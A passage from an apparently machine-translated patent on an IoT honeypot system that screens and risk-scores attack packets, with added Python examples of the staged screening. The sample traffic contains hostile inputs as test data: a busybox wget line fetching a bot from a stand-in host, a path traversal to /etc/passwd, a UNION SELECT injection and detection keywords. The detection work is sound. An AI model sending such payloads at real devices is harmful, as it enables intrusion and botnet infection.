309. Obtaining the corresponding analysis data packets (called second analysis data packets for distinction) for the remaining access data packets of attack induction subsystems B and C; obtaining the protocol used by each second analysis data packet and the access characteristics of its sending user based on its data;
310. If the protocol of a second analysis data packet is a preset protocol in the screening rule and/or the access characteristics match the specific access characteristics of a suspicious user preset in the screening rule, determining the second analysis data packet to be a suspicious analysis data packet;
311. Performing keyword matching on the suspicious analysis data packets based on the attack data packet keywords preset in the screening rule, and determining the successfully matched suspicious analysis data packets to be highly suspicious analysis data packets;
312. If the payload of a highly suspicious analysis data packet contains the vulnerability characteristics of a preset vulnerability in the screening rule; or the content associated with the internet of things protocol in the highly suspicious analysis data packet has the attack characteristics set in the screening rule for the internet of things protocol; or the data of the highly suspicious analysis data packet has the attack characteristics of a preset attack network method set in the screening rule; determining the access data packets corresponding to the highly suspicious analysis data packets as attack data packets of attack induction subsystems B and C;
313. Determining, according to the sending user information of the attack data packets, the attack data packets of the same sending user across all attack induction subsystems as the user-associated attack data packets of that sending user;
314. Converting the number of user-associated attack data packets into a first risk score; determining a second risk score of the user-associated attack data packets according to the risk scores corresponding to the preset screening rules and the screening rules hit by the user-associated attack data packets; obtaining a third risk score according to the preset risk score corresponding to the identification information of each attack induction subsystem and the attack induction subsystems corresponding to the user-associated attack data packets; obtaining a fourth risk score according to the correspondence between the number of attack induction subsystems and the risk score and the number of attack induction subsystems corresponding to the user-associated attack data packets; and summing the first, second, third and fourth risk scores to obtain the total risk score of all user-associated attack data packets of the same sending user;
315. If the total risk score is higher than the risk score threshold, storing the attack data packets in isolation and deleting them from the attack induction system, where the storage device used for the isolated storage is a non-networked device.
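An added Python example (not the patent's own code) of the screening cascade of step 205 and of steps 303 to 312 above: each subsystem's packets pass through the suspicious, highly suspicious and attack stages of its screening rule, and senders already identified as attackers at earlier screening positions are flagged outright. It also contrasts screening B and C in parallel as one second position with screening them one after another. The rule contents, sample packets and addresses are constructed assumptions.

```python
"""Added example, not the patent's own code: staged screening with attacker senders carried
forward along the screening order."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPacket:
    subsystem: str
    sender: str        # sending user, identified here by source address (constructed)
    protocol: str
    payload: str
    req_per_min: int   # access characteristic of the sending user (constructed)


# One constructed screening rule shared by all subsystems (per-subsystem rules are also allowed).
SHARED_RULE = {
    "preset_protocols": {"mqtt", "soap"},               # IoT protocols watched by this rule
    "max_req_per_min": 60,                              # specific access characteristic of a suspicious user
    "keywords": ("union", "select", "$sys"),            # preset attack-packet keywords
    "vuln_features": (re.compile(r"\.\./\.\./"),),                 # preset vulnerability signature
    "iot_features": (re.compile(r"SUBSCRIBE\s+\$SYS/#"),),         # IoT protocol attack characteristic
    "attack_methods": (re.compile(r"union\s+select", re.I),),      # preset attack network method
}


def is_suspicious(p: AccessPacket, rule) -> bool:
    """Protocol is a preset protocol and/or access characteristic matches a suspicious user."""
    return p.protocol in rule["preset_protocols"] or p.req_per_min > rule["max_req_per_min"]


def is_highly_suspicious(p: AccessPacket, rule) -> bool:
    """Keyword match against the preset attack-packet keywords."""
    low = p.payload.lower()
    return any(k in low for k in rule["keywords"])


def attack_rule_hit(p: AccessPacket, rule):
    """Name of the first attack characteristic group that matches, or None."""
    for name in ("vuln_features", "iot_features", "attack_methods"):
        if any(rx.search(p.payload) for rx in rule[name]):
            return name
    return None


def screen_subsystem(packets, rule, known_attackers):
    """Packets from already-identified attackers are attack packets outright; the rest go
    through the three stages. Returns (packet, rule hit) pairs."""
    hits = []
    for p in packets:
        if p.sender in known_attackers:
            hits.append((p, "known_sender"))
            continue
        if not is_suspicious(p, rule) or not is_highly_suspicious(p, rule):
            continue
        name = attack_rule_hit(p, rule)
        if name:
            hits.append((p, name))
    return hits


def cascade(packets_by_subsystem, order, rules):
    """order is a list of screening positions, each a list of subsystem names; subsystems in
    the same position are screened in parallel and only see senders from earlier positions."""
    known, result = set(), {}
    for position in order:
        position_known = set(known)
        for name in position:
            hits = screen_subsystem(packets_by_subsystem[name], rules[name], position_known)
            result[name] = hits
            known.update(p.sender for p, _ in hits)
    return result


# Constructed sample traffic (documentation address ranges).
SAMPLE_PACKETS = {
    "A": [AccessPacket("A", "203.0.113.7", "http", "GET /item?id=1 UNION SELECT name FROM users", 120),
          AccessPacket("A", "198.51.100.2", "http", "GET /index.html", 4)],
    "B": [AccessPacket("B", "203.0.113.7", "http", "GET /login", 3),
          AccessPacket("B", "203.0.113.9", "http", "GET /status", 2)],
    "C": [AccessPacket("C", "203.0.113.9", "mqtt", "SUBSCRIBE $SYS/#", 1)],
}
RULES = {name: SHARED_RULE for name in SAMPLE_PACKETS}

if __name__ == "__main__":
    for order in ([["A"], ["B", "C"]], [["A"], ["C"], ["B"]]):
        res = cascade(SAMPLE_PACKETS, order, RULES)
        print(order, {n: [(p.sender, h) for p, h in hits] for n, hits in res.items()})
```

With B and C in parallel, the sender found only in C is not yet known when B is screened, so its benign-looking packet in B passes; with the sequential order A, C, B it is flagged in B as a known sender.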
By adopting this embodiment, different attack induction subsystems can attract richer attack behavior, so the induction servers in the attack induction system receive more attack data packets; the attack data packets are detected in a targeted manner through the attack data packet screening scheme corresponding to each attack induction subsystem, giving a more accurate detection result, which helps discover more device vulnerabilities and improves the security of the internet of things industry.
In order to solve the above technical problem, this embodiment further provides a security management apparatus for accessing data, and referring to fig. 4, the security management apparatus for accessing data may include:
a data packet obtaining unit 401, configured to obtain an access data packet received by at least one induction server in an attack induction system, where the attack induction system includes at least two attack induction subsystems, and each attack induction subsystem includes an induction server and at least one induction client device connected to the induction server;
a screening scheme determining unit 402, configured to determine a screening order and a screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;
a screening object determining unit 403, configured to determine a currently screened attack inducing subsystem based on a screening order of each attack inducing subsystem;
a first screening unit 404, configured to determine, if the currently screened attack-inducing subsystem is arranged at the most front position in the screening sequence, an attack data packet in the access data packet based on a screening rule corresponding to the currently screened attack-inducing subsystem and the access data packet received by the currently screened attack-inducing subsystem;
a second screening unit 405, configured to, if the currently screened attack inducing subsystem is not arranged at the most front position in the screening sequence, obtain a sending user of a screened attack data packet based on a screening result of the screened attack inducing subsystem, determine, from access data packets received by the currently screened attack inducing subsystem, that an access data packet sent by the sending user is an attack data packet, and determine, based on a screening rule corresponding to the currently screened attack inducing subsystem and an unscreened access data packet of the currently screened attack inducing subsystem, an attack data packet in the unscreened access data packet;
a processing unit 406, configured to process the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
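The screening order and the hand-off of identified sending users from earlier to later subsystems (units 402 to 405), as an added Python example that is not the patent's code; the subsystem names, capability values, per-subsystem rules and sample packets are constructed assumptions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPacket:
    sender: str      # sending user, here a constructed source address
    subsystem: str   # name of the attack induction subsystem whose server received it
    protocol: str
    payload: str


@dataclass(frozen=True)
class Subsystem:
    name: str
    capability: int   # attack induction capability; higher is screened earlier
    protocols: tuple  # screening rule: protocols this subsystem treats as suspicious
    keywords: tuple   # screening rule: attack keywords for this subsystem's services


def screening_order(subsystems):
    """Order the subsystems by attack induction capability, strongest first."""
    return sorted(subsystems, key=lambda s: s.capability, reverse=True)


def rule_hit(sub, pkt):
    """Screening rule of one subsystem: suspicious protocol plus an attack keyword."""
    return pkt.protocol in sub.protocols and any(k in pkt.payload for k in sub.keywords)


def screen(subsystems, packets):
    """Returns {subsystem name: attack packets}.  The first subsystem in the order is
    screened by its rule alone; every later one first takes over the sending users
    already identified by the subsystems before it, then screens the rest by its rule."""
    known_senders = set()
    result = {}
    for position, sub in enumerate(screening_order(subsystems)):
        received = [p for p in packets if p.subsystem == sub.name]
        if position == 0:
            attack = [p for p in received if rule_hit(sub, p)]
        else:
            attack = [p for p in received if p.sender in known_senders]
            unscreened = [p for p in received if p.sender not in known_senders]
            attack += [p for p in unscreened if rule_hit(sub, p)]
        known_senders.update(p.sender for p in attack)
        result[sub.name] = attack
    return result


# Constructed sample subsystems and traffic.
SUBSYSTEMS = (
    Subsystem("intranet-devices", 1, ("http",), ("/etc/passwd",)),
    Subsystem("mqtt-sim", 2, ("mqtt",), ("#",)),
    Subsystem("telnet-honeypot", 3, ("telnet",), ("busybox",)),
)
PACKETS = (
    AccessPacket("10.0.0.5", "telnet-honeypot", "telnet", "cd /tmp; /bin/busybox wget example.invalid/bot"),
    AccessPacket("10.0.0.7", "telnet-honeypot", "telnet", "login: admin"),
    AccessPacket("10.0.0.5", "mqtt-sim", "mqtt", "CONNECT clientid=sensor-1"),   # benign-looking, flagged by hand-off
    AccessPacket("10.0.0.9", "mqtt-sim", "mqtt", "SUBSCRIBE #"),
    AccessPacket("10.0.0.7", "mqtt-sim", "mqtt", "CONNECT clientid=sensor-2"),
    AccessPacket("10.0.0.9", "intranet-devices", "http", "GET /status"),          # benign-looking, flagged by hand-off
    AccessPacket("10.0.0.11", "intranet-devices", "http", "GET /../../etc/passwd"),
)


def screen_sample():
    return screen(SUBSYSTEMS, PACKETS)


if __name__ == "__main__":
    for name, attack in screen_sample().items():
        print(name, sorted({p.sender for p in attack}))
```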
In an optional example, the security management apparatus for accessing data further includes a deployment unit configured to:
before a data packet obtaining unit obtains an access data packet received by at least one induction server in an attack induction system, obtaining a system deployment file of an attack induction subsystem in the attack induction system;
deploying the server inducing equipment of the attack inducing subsystem in a public network and deploying the inducing client equipment of the attack inducing subsystem in a corresponding client deployment network based on the deployment mode and the system deployment file corresponding to the attack inducing subsystem, wherein the server inducing equipment comprises an inducing server.
In one optional example, the attack inducement subsystem comprises at least two associated attack inducement subsystems that share a first inducement server;
a deployment unit to:
deploying the first induction server in the public network based on a deployment mode of at least one associated attack induction subsystem and a system deployment file;
deploying other server inducing devices except the first inducing server in the server inducing devices of the associated attack inducing subsystems according to the deployment mode and the system deployment file of each associated attack inducing subsystem;
and deploying the induced client equipment of each associated attack induction subsystem in the corresponding client deployment network according to the deployment mode of each associated attack induction subsystem and the system deployment file.
In an optional example, the associated attack induction subsystems include a first attack induction subsystem, and the deployment unit is configured to:
simulating the induced client equipment which needs to be set in the first attack induction subsystem in the public network according to the deployment mode of the first attack induction subsystem and the system deployment file;
and running a first target protocol in the public network that is required to simulate the service provided by the inducement client device.
In an optional example, the associated attack induction subsystems include a second attack induction subsystem, and the deployment unit is configured to:
acquiring intranet access information of entity client equipment connected in a target intranet according to the deployment mode of the second attack induction subsystem and the system deployment file;
and determining the entity client equipment as induction client equipment of the second attack induction subsystem, acquiring public network access information obtained after the intranet access information of the entity client equipment is mapped to a public network, and storing the public network access information in the first induction server.
In an optional example, the attack induction subsystems include a third attack induction subsystem, and the deployment unit is configured to:
deploying server-side induction equipment based on a target Internet of things protocol in the public network based on the deployment mode and the system deployment file of the third attack induction subsystem;
simulating Internet of things protocol client equipment based on the target Internet of things protocol in a target intranet to obtain induction client equipment of the third attack induction subsystem;
and in the target intranet, simulating and operating an application program of the Internet of things protocol client equipment so as to simulate the operation of the Internet of things protocol client equipment.
In an optional example, the first screening unit is configured to:
acquiring a corresponding analysis data packet for an access data packet received by a currently screened attack induction subsystem;
acquiring access behavior characteristic information corresponding to the analysis data packet, and determining a suspicious analysis data packet in the analysis data packet based on the access behavior characteristic information;
and performing feature matching on the suspicious analysis data packet based on the attack feature information of the attack data packet preset in the screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packet in the access data packet based on the matching result.
In an optional example, the first screening unit is configured to:
acquiring a protocol used by the analysis data packet based on the data of the analysis data packet;
acquiring access characteristics of a sending user of the analysis data packet based on the data of the analysis data packet;
and if the protocol for analyzing the data packet is a preset protocol in the screening rule corresponding to the currently screened attack inducing subsystem and/or the corresponding access characteristic accords with the specific access characteristic of a preset suspicious user in the screening rule corresponding to the currently screened attack inducing subsystem, determining that the analyzed data packet is a suspicious analyzed data packet.
In an optional example, the first screening unit is configured to:
performing keyword matching on the suspicious analysis data packet based on the attack data packet keywords preset in the screening rule corresponding to the currently screened attack induction subsystem;
determining the successfully matched suspicious analysis data packet as a high suspicious analysis data packet;
and determining an attack data packet in the access data packet based on the high suspicious analysis data packet.
In an optional example, the first screening unit is configured to:
if the payload of the highly suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rule corresponding to the currently screened attack induction subsystem; and/or the associated content associated with the internet of things protocol in the highly suspicious analysis data packet has the attack characteristics aiming at the internet of things protocol in the screening rule corresponding to the currently screened attack induction subsystem; and/or the data of the highly suspicious analysis data packet has the attack characteristics of the preset attack network technique in the screening rule corresponding to the currently screened attack induction subsystem;
and determining the access data packet corresponding to the high suspicious analysis data packet as an attack data packet.
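The staged rule of the first screening unit (suspicious by preset protocol or access characteristic, highly suspicious after a keyword hit, attack packet after a vulnerability, IoT protocol or attack technique feature hit), as an added Python example that is not the patent's code; the rule contents, packet fields, rate threshold and sample packets are constructed assumptions.

```python
from dataclasses import dataclass, field


@dataclass
class ParsedPacket:
    """Analysis data packet obtained from an access packet (fields are constructed)."""
    sender: str
    protocol: str
    payload: str
    req_per_min: int          # access characteristic of the sending user
    iot_fields: dict = field(default_factory=dict)   # content associated with the IoT protocol


@dataclass(frozen=True)
class ScreeningRule:
    suspicious_protocols: frozenset   # preset protocols of interest to this subsystem
    suspicious_req_rate: int          # access characteristic of a preset suspicious user
    keywords: tuple                   # preset attack data packet keywords
    vuln_features: tuple              # payload features of preset vulnerabilities
    iot_attack_features: dict         # IoT field name -> values that are attack features
    technique_features: tuple         # features of preset network attack techniques


def is_suspicious(rule, pkt):
    """Stage 1: preset protocol and/or the suspicious user's access characteristic."""
    return pkt.protocol in rule.suspicious_protocols or pkt.req_per_min >= rule.suspicious_req_rate


def keyword_hit(rule, pkt):
    """Stage 2: keyword matching turns a suspicious packet into a highly suspicious one."""
    return any(k in pkt.payload for k in rule.keywords)


def attack_feature_hit(rule, pkt):
    """Stage 3: vulnerability feature in the payload, and/or IoT protocol attack
    feature in the associated content, and/or attack technique feature."""
    vuln = any(f in pkt.payload for f in rule.vuln_features)
    iot = any(pkt.iot_fields.get(name) in values for name, values in rule.iot_attack_features.items())
    technique = any(f in pkt.payload for f in rule.technique_features)
    return vuln or iot or technique


def classify(rule, pkt):
    """Stage reached by the packet; only "attack" marks the access packet as an attack packet."""
    if not is_suspicious(rule, pkt):
        return "benign"
    if not keyword_hit(rule, pkt):
        return "suspicious"
    if not attack_feature_hit(rule, pkt):
        return "highly_suspicious"
    return "attack"


def attack_packets(rule, packets):
    return [p for p in packets if classify(rule, p) == "attack"]


# Constructed rule for one subsystem and constructed sample packets.
RULE = ScreeningRule(
    suspicious_protocols=frozenset({"telnet", "http", "mqtt"}),
    suspicious_req_rate=100,
    keywords=("passwd", "busybox", "SUBSCRIBE"),
    vuln_features=("../",),
    iot_attack_features={"topic": ("#", "$SYS/#")},
    technique_features=("/bin/busybox", "chmod 777"),
)
SAMPLE = {
    "traversal": ParsedPacket("10.0.0.5", "http", "GET /../../etc/passwd", 120),
    "wildcard_sub": ParsedPacket("10.0.0.9", "mqtt", "SUBSCRIBE", 5, {"topic": "#"}),
    "plain_get": ParsedPacket("10.0.0.7", "http", "GET /index.html", 2),
    "noisy_ssh": ParsedPacket("10.0.0.8", "ssh", "SSH-2.0-OpenSSH_8.9", 300),
    "coap_probe": ParsedPacket("10.0.0.3", "coap", "GET /.well-known/core", 1),
    "telnet_login": ParsedPacket("10.0.0.4", "telnet", "login: admin passwd: admin", 3),
}


def classify_sample():
    return {name: classify(RULE, pkt) for name, pkt in SAMPLE.items()}


if __name__ == "__main__":
    for name, stage in classify_sample().items():
        print(f"{name:13s} -> {stage}")
```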
In an optional example, the processing unit is to:
determining attack data packets of the same sending user aiming at all attack induction subsystems according to the information of the sending user of the attack data packets, and using the attack data packets as user-associated attack data packets of the sending user;
determining the attack risk of the user-associated attack data packets of the same sending user according to the number of the user-associated attack data packets of the same sending user, the number and the attack inducing capacity of the attack inducing subsystems attacked by the user-associated attack data packets and the screening rule hit by the user-associated attack data packets;
processing the user-associated attack data packets, according to the attack risk of the user-associated attack data packets of the same sending user, in a processing mode corresponding to that attack risk.
In an optional example, the apparatus further includes a statistics unit configured to:
acquiring statistical information of the attack data packet on at least one abnormal traffic statistical dimension based on data in the analysis data packet of the attack data packet;
and generating an abnormal traffic statistics report based on the statistical information.
In an optional example, the security management apparatus for access data further includes an information sending unit, configured to send the abnormal traffic statistics report to the management terminal when an abnormal traffic checking instruction sent by the management terminal is received after the abnormal traffic statistics report has been generated based on the statistical information, so that the management terminal can display an abnormal traffic checking page based on the abnormal traffic statistics report.
By adopting the embodiment, the induction servers of different attack induction subsystems can be deployed in the public network, the required induction client devices can be deployed in the public network and the target intranet, and the different attack induction subsystems can attract attack behaviors with more abundant types, so that the induction servers in the attack induction system can receive more attack data packets, and by detecting the attack data packets, more device vulnerabilities can be discovered, thereby being beneficial to improving the safety of the internet of things industry.
In addition, an embodiment of the present invention further provides a computer device, where the computer device may be a terminal or a server, as shown in fig. 5, which shows a schematic structural diagram of the computer device according to the embodiment of the present invention, and specifically:
the computer device may include components such as a processor 501 of one or more processing cores, memory 502 of one or more computer-readable storage media, a power supply 503, and an input unit 504. Those skilled in the art will appreciate that the computer device configuration illustrated in FIG. 5 does not constitute a limitation of computer devices, and may include more or fewer components than those illustrated, or some components may be combined, or a different arrangement of components. Wherein:
the processor 501 is a control center of the computer device, connects various parts of the whole computer device by using various interfaces and lines, runs or executes software programs and/or modules stored in the memory 502, and calls data stored in the memory 502, executes various functions of the computer device and processes the data, thereby monitoring the computer device as a whole. Optionally, processor 501 may include one or more processing cores; preferably, the processor 501 may integrate an application processor, which mainly handles operating systems, user interfaces, application programs, etc., and a modem processor, which mainly handles wireless communications. It will be appreciated that the modem processor may not be integrated into the processor 501.
The memory 502 may be used to store software programs and modules, and the processor 501 executes the software programs and modules stored in the memory 502 to thereby perform various functional applications and data processing. The memory 502 may mainly include a program storage area and a data storage area, wherein the program storage area may store an operating system, an application program required by at least one function (such as a sound playing function, an image playing function, etc.), and the like; the storage data area may store data created according to use of the computer device, and the like. Further, the memory 502 may include high speed random access memory, and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other volatile solid state storage device. Accordingly, the memory 502 may also include a memory controller to provide the processor 501 with access to the memory 502.
The computer device further includes a power supply 503 for supplying power to the various components, and preferably, the power supply 503 may be logically connected to the processor 501 via a power management system, such that the power management system performs functions of managing charging, discharging, and power consumption. The power supply 503 may also include any component of one or more dc or ac power sources, recharging systems, power failure detection circuitry, power converters or inverters, power status indicators, and the like.
The computer device may also include an input unit 504, and the input unit 504 may be used to receive input numeric or character information and generate keyboard, mouse, joystick, optical or trackball signal inputs related to user settings and function control.
Although not shown, the computer device may further include a display unit and the like, which are not described in detail herein. Specifically, in this embodiment, the processor 501 in the computer device loads the executable file corresponding to the process of one or more application programs into the memory 502 according to the following instructions, and the processor 501 runs the application programs stored in the memory 502, so as to implement various functions as follows:
the method comprises the steps that an access data packet received by at least one induction server in an attack induction system is obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;
determining the screening sequence and the screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;
determining the currently screened attack inducing subsystems based on the screening sequence of each attack inducing subsystem;
if the currently screened attack inducing subsystems are arranged at the most front positions in the screening sequence, determining attack data packets in the access data packets based on screening rules corresponding to the currently screened attack inducing subsystems and the access data packets received by the currently screened attack inducing subsystems;
if the currently screened attack inducement subsystems are not arranged at the most front positions in the screening sequence, obtaining a sending user of the screened attack data packets based on the screening result of the screened attack inducement subsystems, determining the access data packets sent by the sending user as the attack data packets from the access data packets received by the currently screened attack inducement subsystems, and determining the attack data packets in the non-screened access data packets based on the screening rules corresponding to the currently screened attack inducement subsystems and the non-screened access data packets of the currently screened attack inducement subsystems;
and processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
The above operations can be implemented in the foregoing embodiments, and are not described in detail herein.
It will be understood by those skilled in the art that all or part of the steps of the methods of the above embodiments may be implemented by instructions, or by instructions controlling associated hardware; the instructions may be stored in a computer readable storage medium and loaded and executed by a processor.
To this end, an embodiment of the present invention further provides a storage medium, where multiple instructions are stored, and the instructions can be loaded by a processor to execute the method for security management of access data provided in the embodiment of the present invention.
According to an aspect of the application, there is also provided a computer program product or a computer program comprising computer instructions stored in a computer readable storage medium. The processor of the computer device reads the computer instructions from the computer-readable storage medium, and the processor executes the computer instructions to cause the computer device to perform the method provided in the various alternative implementations in the embodiments described above.
Wherein the storage medium may include: read Only Memory (ROM), Random Access Memory (RAM), magnetic or optical disks, and the like.
Since the instructions stored in the storage medium can execute the steps of the method for security management of access data provided in the embodiment of the present invention, the beneficial effects achievable by that method can also be achieved; these are detailed in the foregoing embodiments and are not described here again.
The security management method, apparatus, computer device and storage medium for access data provided by the embodiments of the present invention are described in detail above. A specific example is used in the text to explain the principle and implementation of the present invention, and the description of the above embodiments is only intended to help understand the method and the core idea of the present invention; meanwhile, those skilled in the art may, following the idea of the present invention, vary the specific embodiments and the application scope. In summary, the content of this specification should not be construed as limiting the present invention.

Claims (14)

1. A method for security management of access to data, comprising:
obtaining an access data packet received by at least one induction server in an attack induction system, wherein the attack induction system includes at least two attack induction subsystems, and each attack induction subsystem includes an induction server and at least one induction client device connected to the induction server;
determining the screening sequence and the screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;
determining the currently screened attack inducing subsystems based on the screening sequence of each attack inducing subsystem;
if the currently screened attack inducing subsystems are arranged at the most front positions in the screening sequence, determining attack data packets in the access data packets based on screening rules corresponding to the currently screened attack inducing subsystems and the access data packets received by the currently screened attack inducing subsystems;
if the currently screened attack inducing subsystem is not arranged at the most front position in the screening sequence, obtaining a sending user of the screened attack data packet based on the screening result of the screened attack inducing subsystem, determining the access data packet sent by the sending user as an attack data packet from the access data packets received by the currently screened attack inducing subsystem, and determining the attack data packet in the non-screened access data packet based on the screening rule corresponding to the currently screened attack inducing subsystem and the non-screened access data packet of the currently screened attack inducing subsystem;
and processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
2. The method for security management of access data according to claim 1, wherein before acquiring the access data packet received by at least one induction server in the attack induction system, the method further comprises:
acquiring a system deployment file of an attack induction subsystem in the attack induction system;
deploying the server inducing equipment of the attack inducing subsystem in a public network and deploying the inducing client equipment of the attack inducing subsystem in a corresponding client deployment network based on the deployment mode and the system deployment file corresponding to the attack inducing subsystem, wherein the server inducing equipment comprises an inducing server.
3. The method for security management of access data according to claim 2, wherein the attack induction subsystem comprises at least two associated attack induction subsystems sharing a first induction server;
the deploying, based on the deployment mode and the system deployment file corresponding to the attack induction subsystem, the server induction equipment of the attack induction subsystem in a public network and the induction client equipment of the attack induction subsystem in a corresponding client deployment network includes:
deploying the first induction server in a public network based on a deployment mode of at least one associated attack induction subsystem and a system deployment file;
deploying other server inducing devices except the first inducing server in the server inducing devices of the associated attack inducing subsystems according to the deployment mode and the system deployment file of each associated attack inducing subsystem;
and deploying the induced client equipment of each associated attack induction subsystem in the corresponding client deployment network according to the deployment mode of each associated attack induction subsystem and the system deployment file.
4. The method according to claim 3, wherein the associated attack induction subsystems include a first attack induction subsystem, and the deploying the induction client equipment of each associated attack induction subsystem in the corresponding client deployment network according to the deployment mode and the system deployment file of each associated attack induction subsystem includes:
simulating induced client equipment which needs to be set in a first attack induction subsystem in the public network according to the deployment mode of the first attack induction subsystem and a system deployment file;
and simulating, in the public network, a first target protocol required to run the service provided by the inducement client device.
5. The method according to claim 3, wherein the associated attack induction subsystems include a second attack induction subsystem, and the deploying the induction client equipment of each associated attack induction subsystem in the corresponding client deployment network according to the deployment mode and the system deployment file of each associated attack induction subsystem includes:
acquiring intranet access information of entity client equipment connected to a target intranet according to a deployment mode of a second attack induction subsystem and a system deployment file;
and determining the entity client equipment as induction client equipment of the second attack induction subsystem, acquiring public network access information obtained after the intranet access information of the entity client equipment is mapped to a public network, and storing the public network access information in the first induction server.
6. The method according to claim 2, wherein the attack induction subsystems include a third attack induction subsystem, and the deploying, based on the deployment mode and the system deployment file corresponding to the attack induction subsystem, the server induction equipment of the attack induction subsystem in a public network and the induction client equipment of the attack induction subsystem in a corresponding client deployment network includes:
deploying server-side induction equipment based on a target Internet of things protocol in the public network based on the deployment mode and the system deployment file of the third attack induction subsystem;
simulating Internet of things protocol client equipment based on the target Internet of things protocol in a target intranet to obtain induction client equipment of the third attack induction subsystem;
and in the target intranet, simulating and operating an application program of the Internet of things protocol client equipment so as to simulate the operation of the Internet of things protocol client equipment.
7. The method for security management of access data according to any one of claims 1 to 6, wherein the determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack-inducing subsystem and the access data packet received by the currently screened attack-inducing subsystem includes:
acquiring a corresponding analysis data packet for the access data packet received by the currently screened attack inducing subsystem;
acquiring access behavior characteristic information corresponding to the analysis data packet, and determining a suspicious analysis data packet in the analysis data packet based on the access behavior characteristic information;
and performing feature matching on the suspicious analysis data packet based on the attack feature information of the attack data packet preset in the screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packet in the access data packet based on the matching result.
8. The method for security management of access data according to claim 7, wherein the obtaining access behavior feature information corresponding to the parsing packet, and determining a suspicious parsing packet in the parsing packet based on the access behavior feature information includes:
acquiring a protocol used by the analysis data packet based on the data of the analysis data packet;
acquiring access characteristics of a sending user of the analysis data packet based on the data of the analysis data packet;
and if the protocol used for analyzing the data packet is a preset protocol in the screening rule corresponding to the currently screened attack inducing subsystem, and/or the corresponding access characteristic accords with the preset specific access characteristic of the suspicious user in the screening rule corresponding to the currently screened attack inducing subsystem, determining that the analyzed data packet is a suspicious analyzed data packet.
9. The method according to claim 8, wherein the performing feature matching on the suspicious analyzed data packet based on the attack feature information of the attack data packet preset in the screening rule corresponding to the currently-screened attack-inducing subsystem, and determining the attack data packet in the access data packet based on the matching result includes:
performing keyword matching on the suspicious analysis data packet based on the attack data packet keywords preset in the screening rule corresponding to the currently screened attack induction subsystem;
determining the suspicious analyzed data packet which is successfully matched as a high suspicious analyzed data packet;
and determining an attack data packet in the access data packet based on the high suspicious analysis data packet.
10. The method for security management of access data according to claim 9, wherein the determining an attack packet in the access data packet based on the highly suspicious resolved data packet comprises:
if the payload of the highly suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rule corresponding to the currently screened attack induction subsystem; and/or the associated content associated with the internet of things protocol in the high suspicious analysis data packet has the attack characteristics aiming at the internet of things protocol in the screening rule corresponding to the currently screened attack induction subsystem; and/or the data of the highly suspicious analysis data packet has the attack characteristics of the preset attack network method in the screening rule corresponding to the currently screened attack induction subsystem;
and determining the access data packet corresponding to the high suspicious analysis data packet as an attack data packet.
11. The method according to any one of claims 1 to 6, wherein the processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system comprises:
determining attack data packets of the same sending user aiming at all attack induction subsystems according to the information of the sending user of the attack data packets, and using the attack data packets as user-associated attack data packets of the sending user;
determining the attack risk of the user-associated attack data packets of the same sending user according to the number of the user-associated attack data packets of the same sending user, the number and the attack inducing capacity of the attack inducing subsystems attacked by the user-associated attack data packets, and the screening rule hit by the user-associated attack data packets;
and processing the user-associated attack data packet according to the attack risk of the user-associated attack data packet of the same sending user in a processing mode corresponding to the attack risk.
12. A security management apparatus for accessing data, comprising:
the system comprises a data packet acquisition unit, a data packet acquisition unit and a data packet processing unit, wherein the data packet acquisition unit is used for acquiring an access data packet received by at least one induction server in an attack induction system, the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;
the screening scheme determining unit is used for determining the screening sequence and the screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;
a screening object determination unit for determining the currently screened attack inducing subsystems based on the screening order of each attack inducing subsystem;
the first screening unit is used for determining an attack data packet in the access data packets based on a screening rule corresponding to the currently screened attack inducing subsystem and the access data packets received by the currently screened attack inducing subsystem if the currently screened attack inducing subsystem is arranged at the most front position in the screening sequence;
a second screening unit, configured to, if the currently-screened attack inducing subsystem is not arranged at the most front position in the screening order, obtain a sending user of a screened attack data packet based on a screening result of the screened attack inducing subsystem, determine, from access data packets received by the currently-screened attack inducing subsystem, that an access data packet sent by the sending user is an attack data packet, and determine, based on a screening rule corresponding to the currently-screened attack inducing subsystem and an unscreened access data packet of the currently-screened attack inducing subsystem, an attack data packet in the unscreened access data packet;
and a processing unit, used for processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
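The screening procedure recited in claim 12 (order the attack-inducing subsystems by induction capability, screen the front subsystem with its own rule, let every later subsystem first classify packets from already-identified senders as attack packets and then apply its rule only to the remaining unscreened packets, then process by attack risk) is easier to follow as code. The following is an added illustration, not code from the patent or its applicant; the subsystem names, capability values, screening rules, packet contents, and the "subsystems attacked by one sender" risk measure are all constructed assumptions.

```python
"""Ranked honeypot screening pipeline (added illustration of claim 12, not the
patent's own code). Names, rules, packets and the risk measure are constructed."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Set, Tuple


@dataclass(frozen=True)
class AccessPacket:
    sender: str      # the claim's "sending user"; constructed here as a source address
    subsystem: str   # induction subsystem whose induction server received the packet
    payload: str


@dataclass(frozen=True)
class Subsystem:
    name: str
    induction_capability: int             # stronger honeypot -> screened earlier
    rule: Callable[[AccessPacket], bool]  # screening rule: True marks an attack packet


def screening_order(subsystems: List[Subsystem]) -> List[Subsystem]:
    """Screening order derived from induction capability, strongest first."""
    return sorted(subsystems, key=lambda s: s.induction_capability, reverse=True)


def screen(subsystems: List[Subsystem],
           packets: List[AccessPacket]) -> Tuple[Dict[str, List[AccessPacket]], Set[str]]:
    """Screen each subsystem in order; return attack packets per subsystem and the attacker set."""
    attackers: Set[str] = set()
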